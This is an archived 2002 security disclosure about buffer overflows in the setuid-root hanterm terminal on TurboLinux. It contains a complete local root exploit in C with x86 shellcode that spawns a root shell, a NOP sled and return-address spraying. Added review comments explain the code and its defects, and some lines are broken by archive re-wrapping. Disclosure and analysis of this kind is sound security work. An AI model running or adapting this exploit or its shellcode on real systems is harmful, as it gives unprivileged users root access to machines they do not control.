
Overflow Vulnerabilities in hanterm


From: xperc <xperc () hotmail com>
Date: 7 Feb 2002 10:33:27 -0000



Hi, I'm xperc.

  hanterm is a Hangul terminal for X; it is based on the
xterm in XFree86. The hanterm binary is installed
setuid root by default on TurboLinux Server 6.5,
but contains insecure code which allows
unprivileged local users to obtain root access on the
local system.

$which hanterm
/usr/bin/X11/hanterm
$ls -l /usr/bin/X11/hanterm
-rws--x--x      1       root    root 166100  03 13 
2001 /usr/bin/X11/hanterm*
$rpm -qf /usr/bin/X11/hanterm
hanterm-xf-p18-3.3-6
$hanterm -fn `perl -e 'print "a"x100'`
Segmentation fault
$hanterm -hfb `perl -e 'print "a"x8000'`
Segmentation fault
$hanterm -hfn `perl -e 'print "a"x8000'`
Segmentation fault
...etc

/* hanterm_exp.c
 *
 * local exploit for hanterm
 *  .. tested in TurboLinux Server 6.5 (Japan)              
 *
 * thanks my Japanese friend kaju(kaijyu)
 * and Japanese hacker UNYUN.
 *
 *                  by xperc () hotmail com
 *                         2002/02/07
 */

#include <stdio.h>

/* Tuning constants, values exactly as posted (specific to the author's build). */
#define NOP             0x90    /* x86 one-byte NOP; memset() fills buf with it */
#define MAXBUF          88      /* size of buf, the overlong "-fn" argument */
#define RETOFS          84      /* centre of the span of buf that receives retadr (see main) */
#define SHELL_OFS       22      /* offset in buf where shellcode is copied */
#define ESP_OFS         -0xe38  /* added to get_esp() to form retadr */

/*
 * Returns the current stack pointer.
 *
 * There is no C return statement: the inline asm moves %esp into %eax and
 * the function relies on %eax being the integer return register of the
 * x86 calling convention.  That is undefined behaviour as far as the C
 * language is concerned and only works on a compiler/target where nothing
 * clobbers %eax between the asm and the return (presumably the author's
 * 32-bit gcc build).  On a 64-bit toolchain the same instruction captures
 * only the low 32 bits of the stack pointer.
 */
unsigned int get_esp()
{
        __asm__("mov %esp,%eax");
}

int main()
{
        /*
         * Builds an overlong value for hanterm's "-fn" option and execs the
         * setuid binary with it.  The transcript above shows hanterm crashing
         * on long -fn/-hfb/-hfn values, i.e. the option text is apparently
         * copied into a fixed-size buffer with no length check.  The fix on
         * the target side is bounding that copy; the immediate mitigation is
         * removing the setuid bit from /usr/bin/X11/hanterm.
         *
         * Review notes on this program as posted:
         *  - memset/strlen/strncpy/execl are called without <string.h> and
         *    <unistd.h>, relying on implicit declarations (removed in C99).
         *  - The mail archive re-wrapped several lines (the shellcode
         *    initializer, the strncpy call and the "-fn" literal in execl);
         *    the execl literal is not valid C as shown.  Kept verbatim.
         *  - retadr is derived from this program's own stack pointer, so the
         *    behaviour depends on the exact frame layout of main(); the body
         *    is deliberately left byte-for-byte unchanged.
         */
        static char shellcode[]={   /* x86 machine code, copied into buf at SHELL_OFS */
            0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80,
            
0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80,
            0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0,
            
0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,
            0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,
            0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f,
            0x62,0x69,0x6e,0x2f,0x73,0x68,0x00
        }; 
        unsigned int retadr;    /* value repeated over the RETOFS region of buf */
        char buf[MAXBUF];       /* the argument handed to hanterm as -fn */
        int i;
        
        memset(buf,NOP,MAXBUF); /* start with the whole argument filled with NOPs */

        /* Current stack pointer of this process plus a fixed offset. */
        retadr=get_esp()+ESP_OFS;
        /* NOTE(review): %p expects a pointer; retadr is an unsigned int. */
        printf("Jumping address = %p\n",retadr);

        /*
         * Store retadr little-endian at every 4th byte from RETOFS-32 up to
         * RETOFS+28.  NOTE(review): RETOFS+32 is 116 but buf holds MAXBUF
         * (88) bytes, so the later iterations write past the end of buf --
         * an out-of-bounds write in this program itself (undefined behaviour).
         */
        for(i=RETOFS-32;i<RETOFS+32;i+=4){
                buf[i]  =retadr&0xff;
                buf[i+1]=(retadr>>8)&0xff;
                buf[i+2]=(retadr>>16)&0xff;
                buf[i+3]=(retadr>>24)&0xff;
        }
        /* Copies strlen(shellcode) bytes, i.e. without the trailing 0x00. */
        strncpy(buf+SHELL_OFS,shellcode,strlen
(shellcode));
        //buf[MAXBUF-1]='\0';       faint!:-(
        /*
         * buf is therefore not NUL-terminated within its MAXBUF bytes unless
         * a byte of retadr happens to be zero, so execl() reads beyond the
         * array to find the end of the argument.  main() has no return
         * statement; under C99 falling off the end of main yields 0.
         */
        execl("/usr/bin/X11/hanterm","hanterm","-
fn",buf,(char *)0);
}


